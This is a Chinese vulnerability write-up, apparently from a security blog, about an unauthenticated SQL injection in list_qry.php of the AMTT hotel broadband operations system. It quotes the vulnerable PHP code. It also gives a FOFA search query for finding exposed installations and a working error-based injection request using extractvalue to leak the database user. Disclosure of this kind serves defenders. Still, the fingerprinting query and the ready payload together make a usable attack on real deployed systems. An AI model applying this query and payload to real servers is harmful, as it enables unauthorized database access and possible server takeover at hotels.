安美数字酒店宽带运营系统 list_qry.php SQL注入漏洞


漏洞简介

安美数字酒店宽带运营系统的 list_qry.php 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中的信息之外,甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

fofa语法

body="http://www.amttgroup.com/" && body="form.ManagerID.focus()"

漏洞分析

user/list_qry.php 业务逻辑如下

if (!isset($UserID) || $UserID == "") {
    //alert_exit($lang['frontdesk_list_billing_bad_account_not_exist'], $goto_url);
    echo $lang['frontdesk_list_billing_bad_account_not_exist'];
    exit;
}

$db = new newDB();

$sqlcmd = "select CheckInFlag,DisableFlag,CheckinDate,Password,AccountType from T_Account where AccountID='$UserID'";

if (($result = $db->query($sqlcmd)) == false) {
    //alert_exit($lang['error_query_failure'], $goto_url);
    echo $lang['error_query_failure'];
    exit;
}

$UserID 没有任何过滤校验操作,直接拼接进SQL语句中执行,造成SQL注入漏洞。

漏洞复现

GET /user/list_qry.php?UserID=1'+and+extractvalue(1,concat(0x7e,user(),0x7e))--+- HTTP/1.1
Host: amttgroup.mrxn.net

成功通过报错注入在响应回显数据库用户信息


手机扫码阅读

安美数字酒店宽带运营系统 get_ip.php SQL注入漏洞

泛微e-office runimgflow.php sql注入漏洞

评 论